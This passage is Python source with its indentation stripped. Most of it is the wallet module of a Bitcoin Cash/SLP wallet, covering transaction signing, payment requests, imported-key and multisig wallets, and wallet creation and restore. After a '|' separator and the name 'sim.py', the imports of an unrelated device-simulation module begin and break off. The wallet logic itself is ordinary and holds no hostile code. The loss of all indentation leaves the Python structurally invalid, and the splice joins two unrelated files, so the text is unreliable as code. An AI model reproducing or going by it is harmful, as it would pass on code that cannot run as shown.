c, index = k.scan_for_pubkey_index(x_pubkey)
if c == 0:
addr = self.receiving_addresses[index]
elif c == 1:
addr = self.change_addresses[index]
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False, anyonecanpay=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache, anyonecanpay=anyonecanpay)
except UserCancelled:
continue
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_ui_string()
if r.get('token_id', None):
amount_text = str(r['amount'])
else:
amount_text = format_satoshis(r['amount'])
if addr.FMT_UI == addr.FMT_CASHADDR:
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
elif addr.FMT_UI == addr.FMT_SLPADDR:
if r.get('token_id', None):
token_id = r['token_id']
out['URI'] = '{}:{}?amount={}-{}'.format(networks.net.SLPADDR_PREFIX,
addr_text, amount_text, token_id)
else:
addr.show_cashaddr(addr.FMT_CASHADDR)
addr_text = addr.to_ui_string()
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
if not 'index_url' in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
if self.up_to_date:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, token_id=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(Hash(addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if token_id:
d['token_id'] = token_id
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self, write=True):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.save_labels() # In case address labels were set or cleared.
if write:
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True, save=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
if save:
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message, save=save) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True,
save=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None, save=save)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
if save:
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
def f(x):
try:
addr = x['address']
return self.get_address_index(addr) or addr
except:
return addr
return sorted(m, key=f)
except TypeError:
# See issue #1231 -- can get inhomogenous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self._slp_txo.clear(); self.slpv1_validity.clear(); self.token_types.clear(); self.tx_tokinfo.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is compatible.
`reason` is an optional list where you would like a translated string
of why Schnorr isn't possible placed (on False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
# time has passed that air-gapped systems are unlikely to not
# have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def get_change_addresses(self):
return []
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self, include_change=False):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class Slp_ImportedAddressWallet(ImportedAddressWallet):
# Watch-only wallet of imported addresses
wallet_type = 'slp_imported_addr'
def __init__(self, storage):
self._sorted = None
storage.put('wallet_type', self.wallet_type)
super().__init__(storage)
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self, include_change=False):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Slp_ImportedPrivkeyWallet(ImportedPrivkeyWallet):
# wallet made of imported private keys
wallet_type = 'slp_imported_privkey'
def __init__(self, storage):
storage.put('wallet_type', self.wallet_type)
Abstract_Wallet.__init__(self, storage)
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False, save=True):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
if save:
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change, save=False)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change, save=False)
def synchronize(self):
with self.lock:
if self.storage.get('auto_maintain_gap', True):
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def __init__(self, storage):
super().__init__(storage)
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Slp_Standard_Wallet(Standard_Wallet):
wallet_type = 'slp_standard'
def __init__(self, storage):
storage.put('wallet_type', self.wallet_type)
super().__init__(storage)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
return not any([not k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'slp_standard', 'multisig', 'slp_multisig', 'imported', 'slp_imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'slp_standard': Slp_Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'slp_imported_privkey': Slp_ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
'slp_imported_addr': Slp_ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
# Convert 'bip39-slp' wallet type to 'slp_standard' wallet type
if storage.get('wallet_type', '') == 'bip39-slp' or storage.get('wallet_type', '') == 'standard_slp':
storage.put('wallet_type', 'slp_standard')
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
from .mnemonic import Mnemonic_Electrum, Mnemonic
if seed_type == 'electrum':
seed = Mnemonic_Electrum('en').make_seed()
else:
seed = Mnemonic('en').make_seed()
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
elif keystore.is_private_key_list(text,):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
|
sim.py
|
import copy
import inspect
import itertools
from functools import partial
import numpy as np
import os
import random
import threading
import time as ttime
import uuid
import weakref
import warnings
from collections import deque, OrderedDict
from tempfile import mkdtemp
from .signal import Signal, EpicsSignal, EpicsSignalRO
from .areadetector.base import EpicsSignalWithRBV
from .status import DeviceStatus, StatusBase
from .device import (Device, Component as Cpt,
DynamicDeviceComponent as DDCpt, Kind)
from types import SimpleNamespace
from .pseudopos import (PseudoPositioner, PseudoSingle,
real_position_argument, pseudo_position_argument)
from .positioner import SoftPositioner
from .utils import ReadOnlyError, LimitError
from .log import logger
# two convenience functions 'vendored' from bluesky.utils
def new_uid():
return str(uuid.uuid4())
def short_uid(label=None, truncate=6):
"Return a readable but unique id like 'label-fjfi5a'"
if label:
return '-'.join([label, new_uid()[:truncate]])
else:
return new_uid()[:truncate]
class NullStatus(StatusBase):
"A simple Status object that is always immediately done, successfully."
def __init__(self, *args, **kwargs):
